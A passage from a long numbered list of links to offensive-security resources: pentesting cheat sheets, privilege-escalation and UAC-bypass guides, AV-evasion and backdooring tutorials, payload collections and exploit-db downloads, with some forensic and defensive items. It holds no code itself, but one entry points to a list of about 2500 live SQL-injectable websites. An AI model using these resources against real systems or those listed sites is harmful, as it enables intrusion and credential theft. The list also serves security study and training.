http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection -177-Manual SQL Injection Exploitation Step by Step: http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step -178-MSSQL Penetration Testing with Metasploit: http://www.hackingarticles.in/mssql-penetration-testing-metasploit -179-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file -180-MySQL Penetration Testing with Nmap: http://www.hackingarticles.in/mysql-penetration-testing-nmap -181-NetBIOS and SMB Penetration Testing on Windows: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows -182-Network Packet Forensic using Wireshark: http://www.hackingarticles.in/network-packet-forensic-using-wireshark -183-Escape and Evasion Egressing Restricted Networks: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/ -183-Awesome-Hacking-Resources: https://github.com/vitalysim/Awesome-Hacking-Resources -184-Hidden directories and les as a source of sensitive information about web application: https://medium.com/p/84e5c534e5ad -185-Hiding Registry keys with PSRe ect: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 -186-awesome-cve-poc: https://github.com/qazbnm456/awesome-cve-poc -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -188-Post Exploitation in Windows using dir Command: http://www.hackingarticles.in/post-exploitation-windows-using-dir-command 189-Web Application Firewall (WAF) Evasion Techniques #2: https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 -190-Forensics Investigation of Remote PC (Part 1): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1 -191-CloudFront Hijacking: https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/ -192-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato: http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato -194-How to intercept TOR hidden service requests with Burp: https://medium.com/p/6214035963a0 -195-How to Make a Captive Portal of Death: https://medium.com/p/48e82a1d81a/share/twitter -196-How to find any CEO’s email address in minutes: https://medium.com/p/70dcb96e02b0 197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation: https://www.exploit-db.com/download/44630.txt -199-Microsoft Word upload to Stored XSS: https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/ -200-MobileApp-Pentest-Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet -201-awesome: https://github.com/sindresorhus/awesome -201-writing arm shellcode: https://azeria-labs.com/writing-arm-shellcode/ -202-debugging with gdb introduction: https://azeria-labs.com/debugging-with-gdb-introduction/ -203-emulate raspberrypi with qemu: https://azeria-labs.com/emulate-raspberry-pi-with-qemu/ -204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method: https://medium.com/p/a5807a9a8056 -205-A Red Teamer's guide to pivoting: https://artkond.com/2017/03/23/pivoting-guide/ -206-Using WebDAV features as a covert channel: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/ -207-A View of Persistence: https://rastamouse.me/2018/03/a-view-of-persistence/ -208- pupy websocket transport: https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/ -209-Subdomains Enumeration Cheat Sheet: https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html -210-DNS Reconnaissance – DNSRecon: https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ -211-Cheatsheets: https://bitrot.sh/cheatsheet -212-Understanding Guide to Nmap Firewall Scan (Part 2): http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2 -213-Exploit Office 2016 using CVE-2018-0802: https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html -214-windows-exploit-suggester: https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html -215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS: https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html -216-IDS, IPS AND FIREWALL EVASION USING NMAP: https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html -217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet 218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals: https://gbhackers.com/web-application-security-tools-resources -219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet -220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing: https://gbhackers.com/top-500-important-xss-cheat-sheet -221-USBStealer – Password Hacking Tool For Windows Machine Applications: https://gbhackers.com/pasword-hacking -222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals: https://gbhackers.com/mobile-application-penetration-testing -223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now: https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now -224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method: https://gbhackers.com/manual-sql-injection-2 -225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers: https://gbhackers.com/email-spoofing-exploiting-open-relay -226-Email Header Analysis – Received Email is Genuine or Spoofed: https://gbhackers.com/email-header-analysis -227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals: https://gbhackers.com/cyber-threat-intelligence-tools -228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool: https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool -229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -230-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -231-A8-Cross-Site Request Forgery (CSRF): https://gbhackers.com/a8-cross-site-request-forgery-csrf -232-Fully undetectable backdooring PE File: https://haiderm.com/fully-undetectable-backdooring-pe-file/ -233-backdooring exe files: https://haiderm.com/tag/backdooring-exe-files/ -234-From PHP (s)HELL to Powershell Heaven: https://medium.com/p/da40ce840da8 -235-Forensic Investigation of Nmap Scan using Wireshark: http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark -236-Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki -237-wifi-arsenal: https://github.com/0x90/wifi-arsenal -238-XXE_payloads: https://gist.github.com/staaldraad/01415b990939494879b4 -239-xss_payloads_2016: https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016 -240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.: https://github.com/alebcay/awesome-shell -241-The goal of this repository is to document the most common techniques to bypass AppLocker.: https://github.com/api0cradle/UltimateAppLockerByPassList -242-A curated list of CTF frameworks, libraries, resources and softwares: https://github.com/apsdehal/awesome-ctf -243-A collection of android security related resources: https://github.com/ashishb/android-security-awesome -244-OSX and iOS related security tools: https://github.com/ashishb/osx-and-ios-security-awesome -245-regexp-security-cheatsheet: https://github.com/attackercan/regexp-security-cheatsheet -246-PowerView-2.0 tips and tricks: https://gist.github.com/HarmJ0y/3328d954607d71362e3c -247-A curated list of awesome awesomeness: https://github.com/bayandin/awesome-awesomeness -248-Android App Security Checklist: https://github.com/b-mueller/android_app_security_checklist -249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat: https://github.com/brannondorsey/wifi-cracking -250-My-Gray-Hacker-Resources: https://github.com/bt3gl/My-Gray-Hacker-Resources -251-A collection of tools developed by other researchers in the Computer Science area to process network traces: https://github.com/caesar0301/awesome-pcaptools -252-A curated list of awesome Hacking tutorials, tools and resources: https://github.com/carpedm20/awesome-hacking -253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.: https://github.com/cn0xroot/RFSec-ToolKit -254-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -255-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -256-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -257-A curated list of awesome forensic analysis tools and resources: https://github.com/cugu/awesome-forensics -258-Open-Redirect-Payloads: https://github.com/cujanovic/Open-Redirect-Payloads -259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook -260-Windows memory hacking library: https://github.com/DarthTon/Blackbone -261-A collective list of public JSON APIs for use in security.: https://github.com/deralexxx/security-apis -262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.: https://github.com/devsecops/awesome-devsecops -263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi: https://github.com/diasdavid/awesome-hacking-spots -264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups: https://github.com/djadmin/awesome-bug-bounty -265-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom: https://github.com/enddo/awesome-windows-exploitation -267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development: https://github.com/FabioBaroni/awesome-exploit-development -268-A curated list of awesome reversing resources: https://github.com/fdivrp/awesome-reversing -269-Git All the Payloads! A collection of web attack payloads: https://github.com/foospidy/payloads -270-GitHub Project Resource List: https://github.com/FuzzySecurity/Resource-List -271-Use your macOS terminal shell to do awesome things.: https://github.com/herrbischoff/awesome-macos-command-line -272-Defeating Windows User Account Control: https://github.com/hfiref0x/UACME -273-Free Security and Hacking eBooks: https://github.com/Hack-with-Github/Free-Security-eBooks -274-Universal Radio Hacker: investigate wireless protocols like a boss: https://github.com/jopohl/urh -275-A curated list of movies every hacker & cyberpunk must watch: https://github.com/k4m4/movies-for-hackers -276-Various public documents, whitepapers and articles about APT campaigns: https://github.com/kbandla/APTnotes -277-A database of common, interesting or useful commands, in one handy referable form: https://github.com/leostat/rtfm -278-A curated list of tools for incident response: https://github.com/meirwah/awesome-incident-response -279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys: https://github.com/meitar/awesome-lockpicking -280-A curated list of static analysis tools, linters and code quality checkers for various programming languages: https://github.com/mre/awesome-static-analysis -281-A Collection of Hacks in IoT Space so that we can address them (hopefully): https://github.com/nebgnahz/awesome-iot-hacks -281-A Course on Intermediate Level Linux Exploitation: https://github.com/nnamon/linux-exploitation-course -282-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -283-A curated list of awesome infosec courses and training resources.: https://github.com/onlurking/awesome-infosec -284-A curated list of resources for learning about application security: https://github.com/paragonie/awesome-appsec -285-an awesome list of honeypot resources: https://github.com/paralax/awesome-honeypots 286-GitHub Enterprise SQL Injection: https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493 -287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis: https://github.com/secfigo/Awesome-Fuzzing -288-PHP htaccess injection cheat sheet: https://github.com/sektioneins/pcc/wiki -289-A curated list of the awesome resources about the Vulnerability Research: https://github.com/sergey-pronin/Awesome-Vulnerability-Research -290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF: https://github.com/swisskyrepo/PayloadsAllTheThings -291-A collection of Red Team focused tools, scripts, and notes: https://github.com/threatexpress/red-team-scripts -292-Awesome XSS stuff: https://github.com/UltimateHackers/AwesomeXSS -293-A collection of hacking / penetration testing resources to make you better!: https://github.com/vitalysim/Awesome-Hacking-Resources -294-Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet -295-Decrypted content of eqgrp-auction-file.tar.xz: https://github.com/x0rz/EQGRP -296-A bunch of links related to Linux kernel exploitation: https://github.com/xairy/linux-kernel-exploitation -297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -298-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -299-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: -301-Reading Your Way Around UAC (Part 1): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html -302--Reading Your Way Around UAC (Part 2): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html -303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2): https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/ -304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/p/29d034c27978 -304-Automating Cobalt Strike,Aggressor Collection Scripts: https://github.com/bluscreenofjeff/AggressorScripts https://github.com/harleyQu1nn/AggressorScripts -305-Vi Cheat Sheet: https://highon.coffee/blog/vi-cheat-sheet/ -306-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -307-LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/ -308-Systemd Cheat Sheet: https://highon.coffee/blog/systemd-cheat-sheet/ -309-Aircrack-ng Cheatsheet: https://securityonline.info/aircrack-ng-cheatsheet/ -310-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/?p=7212 -311-Wifi Pentesting Command Cheatsheet: https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/ -312-Android Testing Environment Cheatsheet (Part 1): https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/ -313-cheatsheet: https://randomkeystrokes.com/category/cheatsheet/ -314-Reverse Shell Cheat Sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/ -315-Linux Commands Cheat Sheet: https://highon.coffee/blog/linux-commands-cheat-sheet/ -316-Linux Privilege Escalation using Sudo Rights: http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights -317-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -318-Linux Privilege Escalation by Exploiting Cronjobs: http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ -319-Web Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -320-Webshell to Meterpreter: http://www.hackingarticles.in/webshell-to-meterpreter -321-WordPress Penetration Testing using WPScan & Metasploit: http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit -322-XSS Exploitation in DVWA (Bypass All Security): http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security -323-Linux Privilege Escalation Using PATH Variable: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -324-VNC tunneling over SSH: http://www.hackingarticles.in/vnc-tunneling-ssh -325-VNC Pivoting through Meterpreter: http://www.hackingarticles.in/vnc-pivoting-meterpreter -326-Week of Evading Microsoft ATA - Announcement and Day 1: https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html -327-Abusing DNSAdmins privilege for escalation in Active Directory: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -328-Using SQL Server for attacking a Forest Trust: https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html -329-Empire : http://www.harmj0y.net/blog/category/empire/ -330-8 Deadly Commands You Should Never Run on Linux: https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ -331-External C2 framework for Cobalt Strike: https://www.insomniacsecurity.com/2018/01/11/externalc2.html -332-How to use Public IP on Kali Linux: http://www.hackingarticles.in/use-public-ip-kali-linux -333-Bypass Admin access through guest Account in windows 10: http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10 -334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports): http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports -335-Bypass SSH Restriction by Port Relay: http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay -336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key): http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key -337-Bypass UAC in Windows 10 using bypass_comhijack Exploit: http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit -338-Bind Payload using SFX archive with Trojanizer: http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer -339-Capture NTLM Hashes using PDF (Bad-Pdf): http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf -340-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/ -341-Detect SQL Injection Attack using Snort IDS: http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/ -342-Beginner Guide to Website Footprinting: http://www.hackingarticles.in/beginner-guide-website-footprinting/ -343-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -344-Wifi Post Exploitation on Remote PC: http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/ -335-Check Meltdown Vulnerability in CPU: http://www.hackingarticles.in/check-meltdown-vulnerability-cpu -336-XXE: https://phonexicum.github.io/infosec/xxe.html -337-[XSS] Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -338-Engagement Tools Tutorial in Burp suite: http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite -339-Wiping Out CSRF: https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f -340-First entry: Welcome and fileless UAC bypass: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ -341-Writing a Custom Shellcode Encoder: https://medium.com/p/31816e767611 -342-Security Harden CentOS 7 : https://highon.coffee/blog/security-harden-centos-7/ -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html -344-MySQL: https://websec.ca/kb/CHANGELOG.txt -345-Deobfuscation of VM based software protection: http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf -346-Online Assembler and Disassembler: http://shell-storm.org/online/Online-Assembler-and-Disassembler/ -347-Shellcodes database for study cases: http://shell-storm.org/shellcode/ -348-Dynamic Binary Analysis and Obfuscated Codes: http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf -349-How Triton may help to analyse obfuscated binaries: http://triton.quarkslab.com/files/misc82-triton.pdf -350-Triton: A Concolic Execution Framework: http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: https://github.com/JonathanSalwan/Tigress_protection -352-What kind of semantics information Triton can provide?: http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/ -353-Code coverage using a dynamic symbolic execution: http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/ -354-Triton (concolic execution framework) under the hood: http://triton.quarkslab.com/blog/first-approach-with-the-framework/ -355-- Stack and heap overflow detection at runtime via behavior analysis and Pin: http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/ -356-Binary analysis: Concolic execution with Pin and z3: http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/ -357-In-Memory fuzzing with Pin: http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/ -358-Hackover 2015 r150 (outdated solving for Triton use cases): https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py -359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection: https://gbhackers.com/skipfish-web-application-security-scanner -360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains: https://gbhackers.com/sublist3r-penetration-testers -361-bypassing application whitelisting with bginfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -362-accessing-clipboard-from-the-lock-screen-in-windows-10: https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/ -363-bypassing-device-guard-umci-using-chm-cve-2017-8625: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -364-defense-in-depth-writeup: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ -365-applocker-case-study-how-insecure-is-it-really-part-1: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -366-empires-cross-platform-office-macro: https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/ -367-recon tools: https://blackarch.org/recon.html -368-Black Hat 2018 tools list: https://medium.com/p/991fa38901da -369-Application Introspection & Hooking With Frida: https://www.fuzzysecurity.com/tutorials/29.html -370-And I did OSCP!: https://medium.com/p/589babbfea19 -371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests: https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html -372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals: https://gbhackers.com/threat-intelligence-tools -373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: https://techincidents.com/penetration-testing-cheat-sheet/ -374-privilege escalation: https://toshellandback.com/category/privilege-escalation/ -375-The Complete List of Windows Post-Exploitation Commands (No Powershell): https://medium.com/p/999b5433b61e -376-The Art of Subdomain Enumeration: https://blog.sweepatic.com/tag/subdomain-enumeration/ -377-The Principles of a Subdomain Takeover: https://blog.sweepatic.com/subdomain-takeover-principles/ -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!: https://medium.com/p/b250fb40af82 -379-The Solution for Web for Pentester-I: https://medium.com/p/4c21b3ae9673 -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended: https://www.hackingloops.com/hacking-tricks/ -383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology: https://www.hackingloops.com/exploitation-terminology/ -384-How Hackers Kick Victims Off of Wireless Networks: https://www.hackingloops.com/kick-victims-off-of-wireless-networks/ -385-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -386-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom: https://www.hackingloops.com/msfvenom/ -388-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky: https://www.hackingloops.com/payloads-via-usb-rubber-ducky/ -390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1: https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/ -391-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -392-Cracking NTLMv1 Handshakes with Crack.sh: http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/ -393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch: https://medium.com/p/d5e92843e64a -394-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -395-Windows Privilege Escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation -396-Removing Sender’s IP Address From Email’s Received: From Header: https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header -397-Dump Cleartext Password in Linux PC using MimiPenguin: http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin -398-Embedded Backdoor with Image using FakeImageExploiter: http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter -399-Exploit Command Injection Vulnearbility with Commix and Netcat: http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat -400-Exploiting Form Based Sql Injection using Sqlmap: http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap -401-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -402-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks -403-Command Injection to Meterpreter using Commix: http://www.hackingarticles.in/command-injection-meterpreter-using-commix -404-Comprehensive Guide to Crunch Tool: http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool -405-Compressive Guide to File Transfer (Post Exploitation): http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation -406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide): http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng -407-How to Detect Meterpreter in Your PC: http://www.hackingarticles.in/detect-meterpreter-pc -408-Easy way to Hack Database using Wizard switch in Sqlmap: http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap -409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn): http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn -410-Create SSL Certified Meterpreter Payload using MPM: http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm -411-Port forwarding: A practical hands-on guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide -412-Exploit Dev 101: Jumping to Shellcode: https://www.abatchy.com/2017/05/jumping-to-shellcode.html -413-Introduction to Manual Backdooring: https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html -414-Kernel Exploitation: https://www.abatchy.com/2018/01/kernel-exploitation-1 -415-Exploit Dev 101: Bypassing ASLR on Windows: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html -416-Shellcode reduction tips (x86): https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86 -417-OSCE Study Plan: https://www.abatchy.com/2017/03/osce-study-plan -418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400): https://www.abatchy.com/2017/10/defcamp-dotnot -419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE: https://www.ambionics.io/ -420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]: https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017 -421-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/tag/forensics/ -422-windows-kernel-logic-bug-class-access: https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html -423-injecting-code-into-windows-protected: https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html -424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE: https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire -425-Automated Derivative Administrator Search: https://wald0.com/?p=14 -426-A Red Teamer’s Guide to GPOs and OUs: https://wald0.com/?p=179 -427-Pen Testing and Active Directory, Part VI: The Final Case: https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ -428-Offensive Tools and Techniques: https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/ -429-Three penetration testing tips to out-hack hackers: http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/ -430-Introducing BloodHound: https://wald0.com/?p=68 -431-Red + Blue = Purple: http://www.blackhillsinfosec.com/?p=5368 -432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog: https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/ -433-PrivEsc: Unquoted Service Path: https://www.gracefulsecurity.com/privesc-unquoted-service-path/ -434-PrivEsc: Insecure Service Permissions: https://www.gracefulsecurity.com/privesc-insecure-service-permissions/ -435-PrivEsc: DLL Hijacking: https://www.gracefulsecurity.com/privesc-dll-hijacking/ -436-Android Reverse Engineering 101 – Part 1: http://www.fasteque.com/android-reverse-engineering-101-part-1/ -437-Luckystrike: An Evil Office Document Generator: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator -438-the-number-one-pentesting-tool-youre-not-using: https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using -439-uac-bypass: http://www.securitynewspaper.com/tag/uac-bypass/ -440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities: https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities -441-Penetration Testing on X11 Server: http://www.hackingarticles.in/penetration-testing-on-x11-server -442-Always Install Elevated: https://pentestlab.blog/2017/02/28/always-install-elevated -443-Scanning for Active Directory Privileges & Privileged Accounts: https://adsecurity.org/?p=3658 -444-Windows Server 2016 Active Directory Features: https://adsecurity.org/?p=3646 -445-powershell: https://adsecurity.org/?tag=powershell -446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection: https://adsecurity.org/?p=2921 -447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack: https://adsecurity.org/?p=3214 -448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation): https://adsecurity.org/?p=2085 -449-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -450-Background: Microsoft Ofice Exploitation: https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/ -451-Automated XSS Finder: https://medium.com/p/4236ed1c6457 -452-Application 